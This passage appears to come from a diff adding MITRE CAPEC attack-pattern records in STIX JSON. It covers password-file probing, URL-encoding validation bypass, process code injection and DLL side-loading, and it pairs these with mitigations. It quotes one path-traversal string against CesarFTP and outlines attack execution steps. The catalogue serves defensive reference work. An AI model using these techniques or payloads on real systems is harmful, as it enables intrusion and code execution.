"2022-09-29T00:00:00.000Z", + "name": "Probe System Files", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Adversaries may search local file systems and remote file shares for files 
containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.", + "Adversaries may search network shares on computers they have compromised to find files of interest." + ], + "x_capec_prerequisites": [ + "An adversary has access to the file system of a system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Verify that files have proper access controls set, and reduce the storage of sensitive information to only what is necessary.", + "id": "course-of-action--f7009ea8-ba2d-4cdb-86fe-352bd35ae5ff", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-639-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--89b16bf7-ab18-4a61-a200-04e7a496d723", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7009ea8-ba2d-4cdb-86fe-352bd35ae5ff", + "target_ref": "attack-pattern--9a7492fa-b46e-48bc-aae9-beb1d359171e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the encoding of the URL combined with the encoding of the slash characters. 
An attacker can take advantage of the multiple ways of encoding a URL and abuse the interpretation of the URL. A URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.", + "external_references": [ + { + "external_id": "CAPEC-64", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/64.html" + }, + { + "external_id": "CWE-177", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": 
"http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Gunter Ollmann, URL Encoded Attacks - Attacks using the common web browser, CGISecurity.com", + "external_id": "REF-495", + "source_name": "reference_from_CAPEC", + "url": "http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html" + }, + { + "description": "T. Berners-Lee, R. Fielding, L. Masinter, RFC 3986 - Uniform Resource Identifier (URI): Generic Syntax, 2005--01", + "external_id": "REF-496", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc3986.txt" + }, + { + "description": "T. Berners-Lee, L. Masinter, M. McCahill, RFC 1738 - Uniform Resource Locators (URL), 1994--12", + "external_id": "REF-497", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc1738.txt" + }, + { + "description": "HTML URL Encoding Reference, W3Schools.com, Refsnes Data", + "external_id": "REF-498", + "source_name": "reference_from_CAPEC", + "url": "http://www.w3schools.com/tags/ref_urlencode.asp" + }, + { + "description": "The URLEncode and URLDecode Page, Albion Research Ltd", + "external_id": "REF-499", + "source_name": "reference_from_CAPEC", + "url": "http://www.albionresearch.com/misc/urlencode.php" + }, + { + "description": "David Wheeler, Secure Programming for Linux and Unix HOWTO", + "external_id": "REF-500", + "source_name": "reference_from_CAPEC", + "url": "http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/filter-html.html#VALIDATING-URIS" + } + ], + "id": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Slashes and URL Encoding Combined to Bypass Validation Logic", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption (Denial of Service)", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Attack Example: Combined Encodings CesarFTP\n Alexandre Cesari released a freeware FTP server for Windows that fails to provide proper filtering against multiple encoding. The FTP server, CesarFTP, included a Web server component that could be attacked with a combination of the triple-dot and URL encoding attacks.\n An attacker could provide a URL that included a string like\n /...%5C/\n This is an interesting exploit because it involves an aggregation of several tricks: the escape character, URL encoding, and the triple dot.See also: CVE-2001-1335" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. The attacker accesses the server using a specific URL.

Experiment

  1. The attacker tries to encode some special characters in the URL. The attacker find out that some characters are not filtered properly.

Exploit

  1. The attacker crafts a malicious URL string request and sends it to the server.

  2. The server decodes and interprets the URL string. Unfortunately since the input filtering is not done properly, the special characters have harmful consequences.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application accepts and decodes URL string request.", + "The application performs insufficient filtering/canonicalization on the URLs." + ], + "x_capec_skills_required": { + "Low": "An attacker can try special characters in the URL and bypass the URL validation.", + "Medium": "The attacker may write a script to defeat the input filtering mechanism." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e5df63e2-b26c-43a9-b8db-2987556afde6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4d3b43e0-c4ff-4ab4-abd0-67d7f2037409", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1b63d492-1270-4630-97ef-521ac9d05eec", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6dd37d7b-5f87-4f59-b359-666ea8c64721", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + 
"source_ref": "course-of-action--95ef6587-c787-4051-b664-b5e8ca753c20", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b6ea81ef-0f17-4947-9257-d78e4c27418e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3833d761-4a54-4ed3-994b-c7c76c465ae0", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--14d09444-d3f4-4b5d-bd9c-ba056327a444", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1f048925-3094-483c-abf2-c5efe689193a", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--78a37ef6-634a-4ba7-95e4-375cdbab4d64", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1890182c-6989-4e34-bfb2-92b223bcae0c", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--95070cd8-654a-4ca1-bbdb-e0d859a8c051", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--24852297-758a-489f-b2c9-a27cbfbb938e", + "target_ref": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary takes advantage of a bug in an application failing to verify the integrity of the running process to execute arbitrary code in the address space of a separate live process. The adversary could use running code in the context of another process to try to access process's memory, system/network resources, etc. The goal of this attack is to evade detection defenses and escalate privileges by masking the malicious code under an existing legitimate process. 
Examples of approaches include but not limited to: dynamic-link library (DLL) injection, portable executable injection, thread execution hijacking, ptrace system calls, VDSO hijacking, function hooking, reflective code loading, and more.", + "external_references": [ + { + "external_id": "CAPEC-640", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/640.html" + }, + { + "external_id": "CWE-114", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/114.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "Server Software Component: Terminal Services DLL", + "external_id": "T1505.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1505/005" + }, + { + "description": "Hijack Execution Flow: Dynamic Linker Hijacking", + "external_id": "T1574.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/006" + }, + { + "description": "Hijack Execution Flow: KernelCallbackTable", + "external_id": "T1574.013", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/013" + }, + { + "description": "Reflective Code Loading", + "external_id": "T1620", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1620" + } + ], + "id": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Inclusion of Code in Existing Process", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--283d665d-e109-4d5d-8993-6fb25e5923d6" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Execute Unauthorized Commands", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands", + "Read Data" + ] + }, + "x_capec_domains": [ + 
"Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target process: The adversary determines a process with sufficient privileges that they wish to include code into.

  2. Techniques
    On Windows, use the process explorer's security tab to see if a process is running with administror privileges.
    On Linux, use the ps command to view running processes and pipe the output to a search for a particular user, or the root user.

Experiment

  1. Attempt to include simple code with known output: The adversary attempts to include very simple code into the existing process to determine if the code inclusion worked. The code will differ based on the approach used to include code into an existing process.

Exploit

  1. Include arbitrary code into existing process: Once an adversary has determined that including code into the existing process is possible, they will include code for a targeted purpose, such as accessing that process's memory.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The targeted application fails to verify the integrity of the running process that allows an adversary to execute arbitrary code." + ], + "x_capec_skills_required": { + "High": "Knowledge of how to load malicious code into the memory space of a running process, as well as the ability to have the running process execute this code. For example, with DLL injection, the adversary must know how to load a DLL into the memory space of another running process, and cause this process to execute the code inside of the DLL." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Prevent unknown or malicious software from loading through using an allowlist policy.", + "id": "course-of-action--9a551de1-20d0-49ee-b6f2-36ad8f61c8e5", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--65e58781-40ea-404e-93cf-151d351ad305", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9a551de1-20d0-49ee-b6f2-36ad8f61c8e5", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly restrict the location of the software being used.", + "id": 
"course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--85d27ab2-ecd4-456d-b89a-b7c4e35486df", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage security kernel modules providing advanced access control and process restrictions like SELinux.", + "id": "course-of-action--fba11826-8062-4a5b-8894-29e9ad3c0d1c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4f55ef67-7b67-4bc1-970e-dd7c277df922", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fba11826-8062-4a5b-8894-29e9ad3c0d1c", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor API calls like CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC, and similar for Windows.", + "id": "course-of-action--850b6838-1e26-4f64-8405-94d6c0354c1a", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4b00d13c-f642-4b89-8b0b-4f4bec45d3e4", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--850b6838-1e26-4f64-8405-94d6c0354c1a", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor API calls like ptrace system call, use of LD_PRELOAD environment variable, dlfcn dynamic linking API calls, and similar for Linux.", + "id": "course-of-action--59902713-d383-4d5a-9f7e-cfabd2804272", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9fae2dbb-a5ef-4e93-a719-15d38a7d1a44", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--59902713-d383-4d5a-9f7e-cfabd2804272", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor API calls like SetWindowsHookEx and SetWinEventHook which install hook procedures for Windows.", + "id": "course-of-action--5c78933b-9c6a-4046-97df-7a1648deff60", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--61327995-a6d3-4961-9d09-10e051ae76d1", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5c78933b-9c6a-4046-97df-7a1648deff60", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor processes and command-line arguments for unknown behavior related to code injection.", + "id": "course-of-action--07eaafc8-1ee9-4824-bb3e-ca53db5435ab", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cc1ad6dd-6038-4e55-89dd-eade5373a2f3", + "modified": "2023-01-24T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--07eaafc8-1ee9-4824-bb3e-ca53db5435ab", + "target_ref": "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary places a malicious version of a Dynamic-Link Library (DLL) in the Windows Side-by-Side (WinSxS) directory to trick the operating system into loading this malicious DLL instead of a legitimate DLL. Programs specify the location of the DLLs to load via the use of WinSxS manifests or DLL redirection and if they aren't used then Windows searches in a predefined set of directories to locate the file. If the applications improperly specify a required DLL or WinSxS manifests aren't explicit about the characteristics of the DLL to be loaded, they can be vulnerable to side-loading.", + "external_references": [ + { + "external_id": "CAPEC-641", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/641.html" + }, + { + "external_id": "CWE-706", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/706.html" + }, + { + "description": "Hijack Execution Flow:DLL Side-Loading", + "external_id": "T1574.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/002" + }, + { + "description": "Stewart A., DLL SIDE-LOADING: A Thorn in the Side of the Anti-Virus Industry, FireEye", + "external_id": "REF-501", + "source_name": "reference_from_CAPEC", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf" + } + ], + "id": "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328", + "modified": "2020-07-30T00:00:00.000Z", + "name": "DLL Side-Loading", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b" + ], + "x_capec_consequences": { + "Integrity": [ + "Execute Unauthorized Commands", + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target must fail to verify the integrity of the DLL before using them." + ], + "x_capec_skills_required": { + "High": "Trick the operating system in loading a malicious DLL instead of a legitimate DLL." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Prevent unknown DLLs from loading through using an allowlist policy.", + "id": "course-of-action--de1e1fe4-15df-4e37-9686-1b33e0ea2e10", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-641-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--81f3c1eb-7e57-4f55-a177-cadc6a8aeba8", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--de1e1fe4-15df-4e37-9686-1b33e0ea2e10", + "target_ref": "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c8fbd576-b3bb-43e0-b295-5483e8f56bdf", + "modified": 
"2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c", + "target_ref": "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2d42819b-82b4-4def-9360-d1f3e4d3ad65", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474", + "target_ref": "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use of sxstrace.exe on Windows as well as manual inspection of the manifests.", + "id": "course-of-action--21b6aeac-6ff3-477a-a051-f59ad76116f4", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-641-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0606876e-24f7-4cdd-812b-44db26e0f72b", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--21b6aeac-6ff3-477a-a051-f59ad76116f4", + "target_ref": "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": 
"2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Require code signing and avoid using relative paths for resources.", + "id": "course-of-action--bdc2b3ee-acf1-4c8b-a330-6fa318ec5f88", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-641-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--32d49392-d7f7-401f-91bc-541841219209", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bdc2b3ee-acf1-4c8b-a330-6fa318ec5f88", + "target_ref": "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries know that certain binaries will be regularly executed as part of normal processing. If these binaries are not protected with the appropriate file system permissions, it could be possible to replace them with malware. This malware might be 